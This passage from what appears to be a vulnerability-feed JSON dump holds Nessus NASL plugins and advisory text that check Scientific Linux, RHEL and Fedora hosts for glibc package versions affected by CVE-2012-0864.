(20120315)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The glibc packages provide the standard C and standard math libraries\nused by multiple programs on the system. Without these libraries, the\nLinux system cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)\n\nThis update also fixes the following bugs :\n\n - Previously, the dynamic loader generated an incorrect\n ordering for initialization according to the ELF\n specification. This could result in incorrect ordering\n of DSO constructors and destructors. With this update,\n dependency resolution has been fixed.\n\n - Previously, locking of the main malloc arena was\n incorrect in the retry path. This could result in a\n deadlock if an sbrk request failed. With this update,\n locking of the main arena in the retry path has been\n fixed. This issue was exposed by a bug fix provided in a\n previous update.\n\n - Calling memcpy with overlapping arguments on certain\n processors would generate unexpected results. 
While such\n code is a clear violation of ANSI/ISO standards, this\n update restores prior memcpy behavior.\n\nAll users of glibc are advised to upgrade to these updated packages,\nwhich contain patches to resolve these issues.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1203&L=scientific-linux-errata&T=0&P=1602\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b0cb7044\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"glibc-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-common-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-devel-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-headers-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-static-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-utils-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"nscd-2.12-1.47.el6_2.9\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-18T02:47:08", "description": "The glibc packages provide the standard C and standard math libraries\nused by multiple programs on the system. Without these libraries, the\nLinux system cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. 
This could allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)\n\nAll users of glibc are advised to upgrade to these updated packages,\nwhich contain a patch to resolve this issue.", "edition": 13, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : glibc on SL5.x i386/x86_64 (20120319)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "modified": "2012-08-01T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common", "p-cpe:/a:fermilab:scientific_linux:glibc", "p-cpe:/a:fermilab:scientific_linux:glibc-common", "p-cpe:/a:fermilab:scientific_linux:glibc-devel", "p-cpe:/a:fermilab:scientific_linux:nscd", "p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:glibc-utils", "p-cpe:/a:fermilab:scientific_linux:glibc-headers"], "id": "SL_20120319_GLIBC_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61285", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61285);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/12\");\n\n script_cve_id(\"CVE-2012-0864\");\n\n script_name(english:\"Scientific Linux Security Update : glibc on SL5.x i386/x86_64 (20120319)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The glibc packages provide the standard C and standard math libraries\nused 
by multiple programs on the system. Without these libraries, the\nLinux system cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)\n\nAll users of glibc are advised to upgrade to these updated packages,\nwhich contain a patch to resolve this issue.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1203&L=scientific-linux-errata&T=0&P=1866\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?058a6f9a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/02\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"glibc-2.5-81.el5_8.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-common-2.5-81.el5_8.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-debuginfo-2.5-81.el5_8.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-debuginfo-common-2.5-81.el5_8.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-devel-2.5-81.el5_8.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-headers-2.5-81.el5_8.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-utils-2.5-81.el5_8.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"nscd-2.5-81.el5_8.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-25T09:14:00", "description": "Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. 
A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe glibc packages provide the standard C and standard math libraries\nused by multiple programs on the system. Without these libraries, the\nLinux system cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)\n\nAll users of glibc are advised to upgrade to these updated packages,\nwhich contain a patch to resolve this issue.", "edition": 19, "published": "2012-03-20T00:00:00", "title": "RHEL 5 : glibc (RHSA-2012:0397)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "modified": "2012-03-20T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common"], "id": "REDHAT-RHSA-2012-0397.NASL", "href": "https://www.tenable.com/plugins/nessus/58394", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0397. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(58394);\n script_version (\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/24\");\n\n script_cve_id(\"CVE-2012-0864\");\n script_bugtraq_id(52201);\n script_xref(name:\"RHSA\", value:\"2012:0397\");\n\n script_name(english:\"RHEL 5 : glibc (RHSA-2012:0397)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe glibc packages provide the standard C and standard math libraries\nused by multiple programs on the system. Without these libraries, the\nLinux system cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. 
This could allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)\n\nAll users of glibc are advised to upgrade to these updated packages,\nwhich contain a patch to resolve this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0397\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0864\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/03/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0397\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-2.5-81.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-common-2.5-81.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-common-2.5-81.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-common-2.5-81.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-debuginfo-2.5-81.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-81.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-devel-2.5-81.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-headers-2.5-81.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-headers-2.5-81.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-81.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-utils-2.5-81.el5_8.1\")) flag++;\n if 
(rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-utils-2.5-81.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-81.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"nscd-2.5-81.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"nscd-2.5-81.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"nscd-2.5-81.el5_8.1\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:10:23", "description": "Avoid 'nargs' integer overflow which can be used to bypass\nFORTIFY_SOURCE protections.\n\nRevert changes for 552960, they're still causing problems.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2012-02-27T00:00:00", "title": "Fedora 16 : glibc-2.14.90-24.fc16.6 (2012-2162)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "modified": "2012-02-27T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:glibc", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2012-2162.NASL", "href": "https://www.tenable.com/plugins/nessus/58124", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-2162.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58124);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-0864\");\n script_xref(name:\"FEDORA\", value:\"2012-2162\");\n\n script_name(english:\"Fedora 16 : glibc-2.14.90-24.fc16.6 (2012-2162)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Avoid 'nargs' integer overflow which can be used to bypass\nFORTIFY_SOURCE protections.\n\nRevert changes for 552960, they're still causing problems.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=794797\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-February/073668.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?15ad6906\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected glibc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"glibc-2.14.90-24.fc16.6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:10:23", "description": "Avoid 'nargs' integer overflow which can be used to bypass\nFORTIFY_SOURCE protections.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 15, "published": "2012-03-08T00:00:00", "title": "Fedora 15 : glibc-2.14.1-6 (2012-2144)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "modified": "2012-03-08T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:glibc", "cpe:/o:fedoraproject:fedora:15"], "id": "FEDORA_2012-2144.NASL", "href": "https://www.tenable.com/plugins/nessus/58278", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-2144.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58278);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-0864\");\n script_bugtraq_id(52201);\n script_xref(name:\"FEDORA\", value:\"2012-2144\");\n\n script_name(english:\"Fedora 15 : glibc-2.14.1-6 (2012-2144)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Avoid 'nargs' integer overflow which can be used to bypass\nFORTIFY_SOURCE protections.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
